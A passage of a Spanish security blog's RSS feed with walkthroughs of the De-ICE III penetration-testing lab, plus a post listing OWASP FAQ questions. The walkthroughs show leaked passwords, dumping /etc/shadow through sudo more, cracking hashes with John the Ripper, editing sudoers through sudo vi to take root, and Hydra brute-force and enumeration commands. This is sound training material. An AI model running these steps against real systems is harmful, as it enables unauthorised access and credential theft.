To: pirrip@slax.example.net<br />
Subject: welcome to the team<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Thanks!  Glad to be here.</p>
<p>?<br />
<strong>Message  3:</strong><br />
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008<br />
Return-Path: &lt;magwitch@slax.example.net&gt;<br />
From: Abel Magwitch &lt;magwitch@slax.example.net&gt;<br />
Date: Sun, 13 Jan 2008 23:48:57 +0000<br />
To: pirrip@slax.example.net<br />
Subject: havisham<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>I set her up with an accountus servers.  I set her password to &#8220;<strong>changeme</strong>&#8221; and will swing by tomorrow and make sure she changes her pw.</p>
<p>?<br />
<strong>Message  4:</strong><br />
From havisham@slax.example.net  Mon Jan 14 00:05:15 2008<br />
Return-Path: &lt;havisham@slax.example.net&gt;<br />
From: Estella Havisham &lt;havisham@slax.example.net&gt;<br />
Date: Mon, 14 Jan 2008 00:03:56 +0000<br />
To: pirrip@slax.example.net<br />
Subject: next month<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Abel filled me in about next month.  I wanted to ask you if I can grab the week you get back for vacation?  Thanks.</p>
<p>?<br />
<strong>Message  5:</strong><br />
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008<br />
Return-Path: &lt;magwitch@slax.example.net&gt;<br />
From: Abel Magwitch &lt;magwitch@slax.example.net&gt;<br />
Date: Sun, 13 Jan 2008 23:55:41 +0000<br />
To: pirrip@slax.example.net<br />
Subject: vacation<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Hey, I&#8217;ll be taking vacation the second week of next month.  Have any additional tasks that need to be taen care of in advance?</p>
<p>?<br />
<strong>Message  6:</strong><br />
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008<br />
Return-Path: &lt;magwitch@slax.example.net&gt;<br />
From: Abel Magwitch &lt;magwitch@slax.example.net&gt;<br />
Date: Sun, 13 Jan 2008 23:58:28 +0000<br />
To: pirrip@slax.example.net<br />
Subject: vacation<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Sure &#8211; so far, she&#8217;s doing just fine.  I have assigned her a couple web issues and the ftp installation for 2.100.  She seems to be very comfortable, even with the new stuff.</p>
<p>?<br />
<strong>Message  7:</strong><br />
From noreply@fermion.herot.net  Mon Jan 14 00:05:15 2008<br />
Return-Path: &lt;noreply@fermion.herot.net&gt;<br />
From: noreply@fermion.herot.net<br />
Date: Sun, 13 Jan 2008 23:54:42 +0000<br />
To: pirrip@slax.example.net<br />
Subject: Fermion Account Login Reminder<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Fermion Account Login Reminder</p>
<p>Listed below are your Fermion Account login credentials.  Please let us know if you have any questions or problems.</p>
<p>Regards,<br />
Fermion Support<br />
<strong><br />
</strong>E-Mail: pirrip@slax.example.net<strong><br />
Password: 0l1v3rTw1st</strong></p>
<p>Vemos que interesante información nos encontramos en el email 7 y 3 &#8230; Nuestro password y el de havisham!!</p>
<p>Intentemos nuevamente listar el contenido de passwd</p>
<p><strong>pirrip@slax:/tmp$ sudo cat /etc/shadow</strong></p>
<p>We trust you have received the usual lecture from the local System<br />
Administrator. It usually boils down to these three things:</p>
<p>#1) Respect the privacy of others.<br />
#2) Think before you type.<br />
#3) With great power comes great responsibility.</p>
<p>Password:</p>
<p>Sorry, user pirrip is not allowed to execute &#8216;/usr/bin/cat /etc/shadow&#8217; as root on slax.</p>
<p style="text-align: justify;">Parece que no tenemos disponible el comando cat.. Comprobemos entonces que comandos interesantes y de utilidad tenemos&#8230;</p>
<p><strong>pirrip@slax:/tmp$ sudo bash</strong><br />
Sorry, user pirrip is not allowed to execute &#8216;/usr/bin/bash&#8217; as root on slax.<br />
<strong>pirrip@slax:/tmp$ sudo sh</strong><br />
Sorry, user pirrip is not allowed to execute &#8216;/bin/sh&#8217; as root on slax.<br />
<strong>pirrip@slax:/tmp$ sudo ls</strong><br />
Sorry, user pirrip is not allowed to execute &#8216;/usr/bin/ls&#8217; as root on slax.<br />
<strong>pirrip@slax:/tmp$ sudo nano</strong><br />
sudo: nano: command not found<br />
<strong>pirrip@slax:/tmp$ sudo more</strong><br />
usage: more [-dflpcsu] [+linenum | +/pattern] name1 name2 &#8230;<br />
<strong>pirrip@slax:/tmp$ sudo vi</strong></p>
<p style="text-align: justify;">Perfecto, a pesar de no tener disponibles la mayoría de comandos, si tenemos disponibles 2 muy importantes!!! <strong>more</strong> y <strong>vi</strong> . Veamos que podemos hacer con estos.</p>
<p style="text-align: justify;"><strong>pirrip@slax:/tmp$ sudo more /etc/shadow</strong><br />
Password:<br />
<strong>root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::</strong><br />
bin:*:9797:0:::::<br />
daemon:*:9797:0:::::<br />
adm:*:9797:0:::::<br />
lp:*:9797:0:::::<br />
sync:*:9797:0:::::<br />
shutdown:*:9797:0:::::<br />
halt:*:9797:0:::::<br />
mail:*:9797:0:::::<br />
news:*:9797:0:::::<br />
uucp:*:9797:0:::::<br />
operator:*:9797:0:::::<br />
games:*:9797:0:::::<br />
ftp:*:9797:0:::::<br />
smmsp:*:9797:0:::::<br />
mysql:*:9797:0:::::<br />
rpc:*:9797:0:::::<br />
sshd:*:9797:0:::::<br />
gdm:*:9797:0:::::<br />
pop:*:9797:0:::::<br />
nobody:*:9797:0:::::<br />
<strong>pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::<br />
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::<br />
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::</strong></p>
<p style="text-align: justify;">Genial&#8230; Llevemos estos resultados a la herramienta de password cracking John The Ripper.</p>
<p style="text-align: left;"><strong>root@Sec-Track:/pentest/passwords/jtr# ./john &#8211;user=root &#8211;w=/root/passwords/verycool.lst 100.txt</strong><br />
Loaded 1 password hash (FreeBSD MD5 [32/32])<br />
guesses: 0  time: 0:00:08:49 100.00% (ETA: Tue Jun  1 04:48:21 2010)  c/s: 4526  trying: aceguero</p>
<p style="text-align: left;">Lamentablemente no hemos dado con el password de root&#8230; Posiblemente sea un password complejo que no se encuentra incluido en nuestro diccionario.</p>
<p style="text-align: left;">Poniendo a prueba nuestra creatividad, veamos lo que podemos hacer con el comando vi sobre sudo.</p>
<p style="text-align: left;"><strong>pirrip@slax:/tmp$ sudo vi /etc/sudoers</strong><br />
Password:<br />
reading /etc/sudoers</p>
<p style="text-align: left;">Allí modifico los permisos para nuestro usuario pirrip</p>
<p style="text-align: left;"><strong># User privilege specification<br />
root    ALL=(ALL) ALL<br />
pirrip  ALL=(ALL) ALL</strong></p>
<p style="text-align: left;">Ahora tenemos todos los permisos de sudo para ejecutar cualquier comando&#8230; Incluyendo el siguiente!!</p>
<p style="text-align: left;"><strong>pirrip@slax:/tmp$ sudo passwd root</strong><br />
Changing password for root<br />
Enter the new password (minimum of 5, maximum of 127 characters)<br />
Please use a combination of upper and lower case letters and numbers.<br />
New password: ***********<br />
Re-enter new password: ***********<br />
Password changed.</p>
<p style="text-align: left;">Ahora solo basta:</p>
<p style="text-align: left;"><strong>pirrip@slax:/tmp$ su</strong><br />
Password: ***********<br />
<strong>root@slax:/tmp# </strong></p>
<p style="text-align: left;">Para el próximo post veremos algunos otros métodos para comprometer este sistema&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-acceso-al-sistema-y-elevacion-de-privilegios/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>FAQ OWASP: Preguntas Frecuentes sobre Seguridad en Aplicaciones Web</title>
		<link>http://www.sec-track.com/faq-owasp-preguntas-frecuentes-sobre-seguridad-en-aplicaciones-web</link>
		<comments>http://www.sec-track.com/faq-owasp-preguntas-frecuentes-sobre-seguridad-en-aplicaciones-web#comments</comments>
		<pubDate>Mon, 24 May 2010 21:48:15 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[Web Application Security]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=566</guid>
		<description><![CDATA[Hace varios años tuve el placer de conocer este magnífico FAQ sobre Seguridad en Aplicaciones Web desarrollado por OWASP. Recientemente volví a encontar el documento (pdf) y un website habilitado por OWASP para consultarlo On-Line. Si bien es cierto que la fecha de publicación del documento está un poco antigua, también es cierto que cada [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Hace varios años tuve el placer de conocer este magnífico FAQ sobre Seguridad en Aplicaciones Web desarrollado por OWASP. Recientemente volví a encontar el documento (pdf) y un website habilitado por OWASP para consultarlo On-Line.</p>
<p style="text-align: justify;"><span id="more-566"></span>Si bien es cierto que la fecha de publicación del documento está un poco antigua, también es cierto que cada uno de estos temas siempre estarán vigentes en nuestro día a día como consultores, desarrolladores e investigadores en Seguridad de la Información.</p>
<p style="text-align: justify;">Dejo un listado con algunas de las preguntas cubiertas en el documento:</p>
<ul>
<li>¿Cuáles son las amenazas más usuales en las aplicaciones Web?</li>
<li>¿Qué libros son aconsejables para aprender técnicas o prácticas de programación segura?</li>
<li>Hay algún programa de entrenamiento sobre programación segura al cual pueda atender?</li>
<li>¿Qué aspectos debo recordar a la hora de diseñar las páginas de inicio de sesión (login)?</li>
<li>¿Cómo funciona la técnica MD5 con sal (salted-MD5)?</li>
<li>¿Como puede ser explotada mi función de recordatorio de contraseña?</li>
<li>En la función de recordar contraseña, ¿Es mejor mostrar la contraseña o permitir al usuario reestablecerla?</li>
<li>¿Y si el atacante a plantado un registrador de tecleos (Keystroke logger) en la computadora cliente? ¿Puedo contrarestar esto?</li>
<li>¿Qué es la inyección de SQL?</li>
<li>Además del usuario y contraseña, ¿qué otras variables son candidatas para la inyección de SQL en nuestras aplicaciones?</li>
<li>¿Cómo evitamos ataques de inyección de SQL?</li>
<li>Estoy usando procedimientos almacenados para la autenticación, ¿soy vulnerable?</li>
<li>¿Qué información puede ser manipulada por un atacante?</li>
<li>¿Cómo manipulan los atacantes la información? ¿Qué herramientas usan?</li>
<li>¿Cómo puede usarse la memoria rápida (cache) del navegador para realizar ataques?</li>
<li>¿Qué es el XSS?</li>
<li>¿Qué información puede robar un atacante mediante XSS?</li>
<li>¿Cómo puedo evitar ataques XSS?</li>
<li>¿Cómo identifican los atacantes qué servidor Web estoy usando?</li>
<li>Una vez falsificado el banner,¿puede mi servidor Web ser identificado?</li>
<li>Quiero encadenar un software de tipo proxy con mi servidor proxy, ¿existen herramientas que permitan hacerlo?</li>
<li>¿No pueden ser automatizadas las pruebas? ¿Existen herramientas que pueda correr contra mi aplicación?</li>
<li>¿Dónde puedo realizar mis pruebas? ¿Existe una aplicación Web con la que pueda practicar?</li>
<li>Qué son las cookies seguras?</li>
<li>¿Puede otro sitio Web robar las galletas que mi sitio Web almacena en la máquina de un usuario?</li>
<li>¿Cuál es el mejor método para transmitir identificadores de sesión: en galletas, en la URL o en variables ocultas?</li>
<li>¿Qué son los registros W3C?</li>
<li>¿Qué debo registrar en el registros de mi aplicación?</li>
<li>¿Debería usar SSL de 40 o de 128 bits?</li>
<li>¿Realmente SSL de 40 bits es inseguro?</li>
<li>¿Qué son los cortafuegos de aplicación? ¿Qué tan buenos son en realidad?</li>
<li>¿En qué consisten los registros referrer (referrer logs) y las URLs sensibles?</li>
<li>¿Quiero usar el lenguaje más seguro?¿Cuál es más recomendable?</li>
</ul>
<p><a href="http://www.owasp.org/index.php/OWASP_Application_Security_FAQ" target="_blank"><strong>Sitio Web oficial del proyecto FAQ OWASP</strong></a></p>
<p><a href="http://www.adrive.com/public/dc1dd5702449ae1e6e4fbf5397d6357e01cbed9f5b0985a1a2f34e9341a31f3a.html" target="_blank"><strong>Descargar documento FAQ OWASP (PDF)</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/faq-owasp-preguntas-frecuentes-sobre-seguridad-en-aplicaciones-web/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Desarrollo del entorno De-Ice III – Pruebas de Autenticación y Escaneo de Vulnerabilidades</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-pruebas-de-autenticacion-y-escaneo-de-vulnerabilidades</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-pruebas-de-autenticacion-y-escaneo-de-vulnerabilidades#comments</comments>
		<pubDate>Wed, 07 Apr 2010 03:06:12 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[De-ICE]]></category>
		<category><![CDATA[Hydra]]></category>
		<category><![CDATA[JBroFuzz]]></category>
		<category><![CDATA[Ncrack]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Vulnerability Scanning]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=505</guid>
		<description><![CDATA[Continúa desde: Desarrollo del entorno De-Ice III – Enumeración de usuarios Una vez hemos identificado los usarios válidos en el sistema, pasemos a realizar algunas pruebas de autenticación  a través de los servicios ofrecidos por el host. Veamos: FTP Hydra: root@bt:~# hydra 192.168.2.100 ftp -s 21 -L usuarios.txt -P /pentest/passwords/wordlists/dicc.lst -t 36 SSH Hydra: root@bt:~# [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continúa desde: <strong><a title="Permanent Link to Desarrollo del entorno De-Ice III – Enumeración de usuarios" rel="bookmark" href="../desarrollo-del-entorno-de-ice-iii-%e2%80%93-enumeracion-de-usuarios">Desarrollo del entorno De-Ice III – Enumeración de usuarios</a></strong></p>
<p style="text-align: justify;">Una vez hemos identificado los usarios válidos en el sistema, pasemos a realizar algunas pruebas de autenticación  a través de los servicios ofrecidos por el host. Veamos:</p>
<p style="text-align: justify;"><strong>FTP</strong></p>
<p style="text-align: justify;"><strong><a href="http://www.thc.org/thc-hydra/" target="_blank">Hydra</a>:</strong></p>
<p style="text-align: justify;">root@bt:~# hydra 192.168.2.100 ftp -s 21 -L usuarios.txt -P /pentest/passwords/wordlists/dicc.lst -t 36</p>
<p style="text-align: justify;"><strong>SSH</strong></p>
<p style="text-align: justify;"><strong><a href="http://www.thc.org/thc-hydra/" target="_blank">Hydra</a>:<br />
</strong></p>
<p style="text-align: justify;">root@bt:~# hydra 192.168.2.100 ftp -s 21 -L usuarios.txt -P /pentest/passwords/wordlists/dicc.lst -t 36</p>
<p style="text-align: justify;"><strong><a href="http://nmap.org/ncrack/" target="_blank">Ncrack</a>:</strong></p>
<p style="text-align: justify;">root@bt:/usr/local/share/ncrack# ncrack 192.168.1.100:22 -P /pentest/passwords/wordlists/pass.txt</p>
<p style="text-align: justify;">Después de mucho esperar mientras se llevaba a cabo los intentos de inicio de sesión con un usuario y password válido llegamos a la conclusión de que este no es un camino viable para acceder al sistema, pues las pruebas fueron realizadas con diccionarios en un comienzo básicos y compuestos por palabras comunes hasta diccionarios bastante robustos de millones de palabras, por lo tanto podemos afirmar que las contraseñas son complejas o los mecanismos de autenticación están medianamente asegurados.</p>
<p style="text-align: justify;">Hagamos uso de varios identificadores de vulnerabilidades, configuraciones por defecto o archivos y directorios sensibles. Para ello primero usemos <a href="http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project" target="_blank"><strong>OWASP Dirbuster</strong></a> para identificar directorios y archivos.</p>
<p style="text-align: justify;"><strong>Host 192.168.2.100</strong></p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -H -u http://192.168.2.100/ -r</strong><br />
DirBuster: option requires an argument &#8212; r<br />
Starting OWASP DirBuster 0.12 in headless mode<br />
Starting dir/file list based brute forcing<br />
Dir found: / &#8211; 200<br />
Dir found: /cgi-bin/ &#8211; 403<br />
Dir found: /icons/ &#8211; 200<br />
File found: /level.html &#8211; 200<br />
File found: /copyright.txt &#8211; 200<br />
File found: /index2.html &#8211; 200</p>
<p style="text-align: justify;"><strong>Host 192.168.2.101</strong></p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -H -u http://192.168.2.101/ -r</strong><br />
DirBuster: option requires an argument &#8212; r<br />
Starting OWASP DirBuster 0.12 in headless mode<br />
Starting dir/file list based brute forcing<br />
Dir found: / &#8211; 200<br />
Dir found: /cgi-bin/ &#8211; 403<br />
Dir found: /home/ &#8211; 403<br />
Dir found: /icons/ &#8211; 200<br />
File found: /200711_002.pdf &#8211; 200<br />
File found: /200611_001.pdf &#8211; 200<br />
File found: /200711_004.pdf &#8211; 200<br />
File found: /Acceptable_Use_Policy.pdf &#8211; 200<br />
File found: /Audit_Policy.pdf &#8211; 200<br />
File found: /Email_Policy.pdf &#8211; 200</p>
<p style="text-align: justify;"><strong>Ahora con Nikto en modo default<br />
</strong></p>
<p style="text-align: justify;"><strong>Host 192.168.2.100</strong></p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# perl nikto.pl -h 192.168.2.100</strong><br />
- Nikto v2.1.0<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ Target IP:          192.168.2.100<br />
+ Target Hostname:    slax.example.net<br />
+ Target Port:        80<br />
+ Start Time:         2010-03-13 17:14:41<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
+ OSVDB-0: Apache/2.0.55 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.<br />
+ OSVDB-0: PHP/5.1.2 appears to be outdated (current is at least 5.2.8)<br />
+ OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE<br />
+ OSVDB-0: DEBUG HTTP verb may show server debugging information<br />
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST<br />
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.<br />
+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons<br />
+ OSVDB-3233: /icons/README: Apache default file found.<br />
+ 3588 items checked: 8 item(s) reported on remote host<br />
+ End Time:           2010-03-13 17:15:08 (27 seconds)<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ 1 host(s) tested</p>
<p style="text-align: justify;"><strong>Host 192.168.2.101</strong></p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# perl nikto.pl -h 192.168.2.101</strong><br />
- Nikto v2.1.0<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ Target IP:          192.168.2.101<br />
+ Target Hostname:    192.168.2.101<br />
+ Target Port:        80<br />
+ Start Time:         2010-03-13 17:16:25<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
+ OSVDB-0: Apache/2.0.55 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.<br />
+ OSVDB-0: PHP/5.1.2 appears to be outdated (current is at least 5.2.8)<br />
+ OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE<br />
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST<br />
+ OSVDB-637: <strong>/~root/</strong>: Allowed to browse root&#8217;s home directory.<br />
+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons<br />
+ OSVDB-3233: /icons/README: Apache default file found.<br />
+ 3588 items checked: 7 item(s) reported on remote host<br />
+ End Time:           2010-03-13 17:16:54 (29 seconds)<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ 1 host(s) tested</p>
<p style="text-align: justify;">Además de las alertas sobre las versiones desactualizadas de software, podemos destacar la identificación del directorio de usuario root. (<strong>~root</strong>). Esto nos permite deducir que posiblemente existan diferentes directorios para los usuarios identificados. Veamos:</p>
<p style="text-align: justify;"><strong>Con netcat</strong></p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80</strong><br />
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out<br />
(UNKNOWN) [192.168.2.101] 80 (www) open<br />
GET <strong>/~root/</strong> HTTP/1.0</p>
<p style="text-align: justify;">HTTP/1.1 200 OK<br />
Date: Fri, 12 Mar 2010 17:36:11 GMT<br />
Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
Content-Length: 557<br />
Connection: close<br />
Content-Type: text/html</p>
<p style="text-align: justify;">&#8230;</p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80</strong><br />
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out<br />
(UNKNOWN) [192.168.2.101] 80 (www) open<br />
GET<strong> /~pirrip/</strong> HTTP/1.0</p>
<p style="text-align: justify;">HTTP/1.1 200 OK<br />
Date: Fri, 12 Mar 2010 17:38:13 GMT<br />
Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
Content-Length: 561<br />
Connection: close<br />
Content-Type: text/html</p>
<p style="text-align: justify;">&#8230;</p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80</strong><br />
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out<br />
(UNKNOWN) [192.168.2.101] 80 (www) open<br />
GET <strong>/~magwitch/</strong> HTTP/1.0</p>
<p style="text-align: justify;">HTTP/1.1 200 OK<br />
Date: Fri, 12 Mar 2010 17:40:13 GMT<br />
Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
Content-Length: 565<br />
Connection: close<br />
Content-Type: text/html</p>
<p style="text-align: justify;">&#8230;</p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80</strong><br />
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out<br />
(UNKNOWN) [192.168.2.101] 80 (www) open<br />
GET<strong> /~havisham/</strong> HTTP/1.0</p>
<p style="text-align: justify;">HTTP/1.1 200 OK<br />
Date: Fri, 12 Mar 2010 17:42:27 GMT<br />
Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
Content-Length: 565<br />
Connection: close<br />
Content-Type: text/html</p>
<p style="text-align: justify;">Otra herramienta que nos permite identificar posibles usuarios, archivos, directorios en un host, es la herramienta de  <a href="http://www.s21sec.com/descargas/articuloFuzzing.pdf" target="_blank"><strong>Fuzzing</strong></a> <a href="http://www.owasp.org/index.php/Category:OWASP_JBroFuzz" target="_blank"><strong>JBroFuzz</strong></a></p>
<p style="text-align: justify;">Veamos:</p>
<p style="text-align: justify;">Tenemos los posibles usuarios válidos del sistema:</p>
<p>pickwick<br />
winkle<br />
snodgrass<br />
tupman<br />
weller<br />
tweller<br />
havisham<br />
magwitch<br />
pirrip<br />
nickleby<br />
rnickleby<br />
noggs<br />
squeers<br />
pinch<br />
tapley<br />
gamp<br />
marley<br />
scrooge<br />
cratchit<br />
sikes<br />
dawkins<br />
claypole<br />
root</p>
<p>Los cuales a su vez pueden tener un directorio como el identificado para root</p>
<p>Basta entonces con agregarle el símbolo virgulilla (~) al comienzo de cada uno y anexarlo a las listas de<a href="http://www.s21sec.com/descargas/articuloFuzzing.pdf" target="_blank"><strong> fuzzing</strong></a> de <strong> <a href="http://www.owasp.org/index.php/Category:OWASP_JBroFuzz" target="_blank">JBroFuzz</a></strong>.</p>
<p>0,http://192.168.2.101/~pickwick,404,Not Found,No,No<br />
1,http://192.168.2.101/~winkle,404,Not Found,No,No<br />
2,http://192.168.2.101/~snodgrass,404,Not Found,No,No<br />
3,http://192.168.2.101/~tupman,404,Not Found,No,No<br />
4,http://192.168.2.101/~weller,404,Not Found,No,No<br />
5,http://192.168.2.101/~tweller,404,Not Found,No,No<br />
<strong>6,http://192.168.2.101/~havisham,200,OK,No,No</strong><br />
<strong>7,http://192.168.2.101/~magwitch,200,OK,No,No</strong><br />
<strong>8,http://192.168.2.101/~pirrip,200,OK,No,No</strong><br />
9,http://192.168.2.101/~nickleby,404,Not Found,No,No<br />
10,http://192.168.2.101/~rnickleby,404,Not Found,No,No<br />
11,http://192.168.2.101/~noggs,404,Not Found,No,No<br />
12,http://192.168.2.101/~squeers,404,Not Found,No,No<br />
13,http://192.168.2.101/~pinch,404,Not Found,No,No<br />
14,http://192.168.2.101/~tapley,404,Not Found,No,No<br />
15,http://192.168.2.101/~gamp,404,Not Found,No,No<br />
16,http://192.168.2.101/~marley,404,Not Found,No,No<br />
17,http://192.168.2.101/~scrooge,404,Not Found,No,No<br />
18,http://192.168.2.101/~cratchit,404,Not Found,No,No<br />
19,http://192.168.2.101/~sikes,404,Not Found,No,No<br />
20,http://192.168.2.101/~dawkins,404,Not Found,No,No<br />
21,http://192.168.2.101/~claypole,404,Not Found,No,No<br />
<strong>22,http://192.168.2.101/~root<strong>,200,OK,No,No</strong></strong></p>
<p>Las líneas que están en negrita corresponden a ubicaciones reales y activas en el servidor objetivo</p>
<p>~havisham<br />
~magwitch<br />
~pirrip<br />
~root</p>
<p>Hagamos ahora una exploración de directorios y archivos mediante JBroFuzz a los directorios raíz del server y de los usuarios identificados.</p>
<p><strong>Al host 192.168.2.100</strong></p>
<p>4,http://192.168.2.100//icons/,200,OK,No,No<br />
784,http://192.168.2.100//index.php/123,200,OK,No,No<br />
<strong>802,http://192.168.2.100//info.php,200,OK,No,No</strong> (Y)</p>
<p><strong>Al host 192.1682.101</strong></p>
<p>4,http://192.168.2.101//icons/,200,OK,No,No</p>
<p>Ahora a los directorios identificados para los usuarios:</p>
<p><strong>Usuario havisham:</strong></p>
<p>Ningún resultado de interés</p>
<p><strong>Usuario magwitch:</strong></p>
<p>Ningún resultado de interés</p>
<p><strong>Usuario pirrip:</strong></p>
<p>385,http://192.168.2.101/~pirrip//.ssh,200,OK,No,No</p>
<p><strong>Usuario root:</strong></p>
<p>Ningún resultado de interés</p>
<p>Vemos entonces como pudimos identificar la existencia del directorio .ssh para el usuario pirrip</p>
<p>http://192.168.2.101/~pirrip//.ssh/</p>
<h1>Index of /~pirrip//.ssh</h1>
<pre><img src="http://192.168.2.101/icons/blank.gif" alt="Icon " /> Name                    Last modified      Size  Description
<hr /><img src="http://192.168.2.101/icons/back.gif" alt="[DIR]" /> Parent Directory                             -
<img src="http://192.168.2.101/icons/unknown.gif" alt="[   ]" /> id_rsa                  05-Jan-2008 20:29  1.6K
<img src="http://192.168.2.101/icons/unknown.gif" alt="[   ]" /> id_rsa.pub              05-Jan-2008 20:29  393
<hr /></pre>
<address>Apache/2.0.55 (Unix) PHP/5.1.2 Server at 192.168.2.101 Port 80</address>
<p>En el próximo post veremos como podemos utilizar la información obtenida para penetrar el sistema.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-pruebas-de-autenticacion-y-escaneo-de-vulnerabilidades/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Turnkey Linux, Proyecto de Appliances para la Implementación de Laboratorios de Seguridad Informática</title>
		<link>http://www.sec-track.com/turnkey-linux-proyecto-de-appliances-para-la-implementacion-de-laboratorios-de-seguridad-informatica</link>
		<comments>http://www.sec-track.com/turnkey-linux-proyecto-de-appliances-para-la-implementacion-de-laboratorios-de-seguridad-informatica#comments</comments>
		<pubDate>Mon, 29 Mar 2010 23:23:24 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Aseguramiento]]></category>
		<category><![CDATA[Gobierno IT]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Appliances]]></category>
		<category><![CDATA[Hardening]]></category>
		<category><![CDATA[LiveCD]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Virtualización]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=509</guid>
